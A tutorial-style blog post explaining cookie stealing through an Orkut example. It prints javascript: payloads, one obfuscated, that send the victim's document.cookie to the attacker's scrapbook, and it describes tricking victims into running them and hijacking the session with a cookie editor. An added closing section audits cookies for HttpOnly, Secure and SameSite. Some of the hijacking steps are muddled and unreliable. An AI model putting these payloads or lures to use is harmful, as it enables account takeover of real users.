
What is Cookie Stealing? How it is used for hacking


Cookie stealing is a hacking method used to hack Gmail or social networking accounts. Orkut was a big victim of this kind of attack.

What is a cookie?

A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is usually a small piece of data sent from a website and stored in the web browser while the user is browsing that website. When the user browses the same website in the future, the data stored in the cookie can be retrieved by the website to notify it of the user's previous activity.

But cookies may contain information that is vital for hackers who want to hack your account.

How is cookie stealing done?

Let us look at this with an example.

I am giving you an example of hacking an Orkut account using cookie stealing, which was very common when Orkut was famous.

This is only for learning purposes. Use this only to understand the concept of cookie stealing. Don't use this technique to hack any email or social networking account or for any criminal activities.

Example of a cookie script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit()

First the hacker changes toUserId.value to his own user ID. The user ID can be obtained by right-clicking and selecting the properties of any Orkut album photo.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

Now the hacker sends this script to the victim and asks him to paste it into the address bar and press Enter. If he does that, the victim's cookie will be in the hacker's scrapbook.

Next, he goes to his Orkut home page, clicks Tools → Cookie Editor, clicks Filter and looks for the Orkut.state cookie. He double-clicks it and replaces the Orkut.state part with the victim's script.

Then he puts his eight-digit number in place of 33444211.

That's it. He then logs out and logs in to Orkut again, and what the hacker sees is the victim's Orkut home page.

So remember: if you have any account, never run suspicious scripts like this from others, as doing so will result in your account getting hacked. Make sure that your PC is protected with updated security software.
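
The scripts above work only because the session cookie is readable through document.cookie. The following is an added example, not part of the original post and not Orkut's code: it audits Set-Cookie headers and models what a page script can read. The function names, the cookie name orkut_state (a stand-in for the Orkut.state cookie mentioned above) and all header values are constructed for illustration.

```javascript
// Added example: audit Set-Cookie headers and model what document.cookie exposes.
// All header values below are constructed samples, not captured traffic.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name: eq === -1 ? '' : pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Emulate the string a page script reads from document.cookie:
// browsers leave HttpOnly cookies out of it.
function documentCookieView(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// List the protective attributes a cookie is missing.
function auditCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const missing = [];
  if (!attrs.httponly) missing.push('HttpOnly'); // readable by any script in the page
  if (!attrs.secure) missing.push('Secure');     // also sent over unencrypted HTTP
  if (!attrs.samesite) missing.push('SameSite'); // cross-site policy not set explicitly
  return { name, missing };
}

// Constructed samples: the same session cookie, weak and hardened.
const weak = ['orkut_state=SESSION123; Path=/', 'lang=en; Path=/'];
const hardened = [
  'orkut_state=SESSION123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'lang=en; Path=/',
];

console.log(documentCookieView(weak));     // session value is visible to script
console.log(documentCookieView(hardened)); // session value is withheld
console.log(auditCookie(weak[0]));
```

HttpOnly keeps the session cookie out of document.cookie; it does not restrict anything else a script running in the page can do.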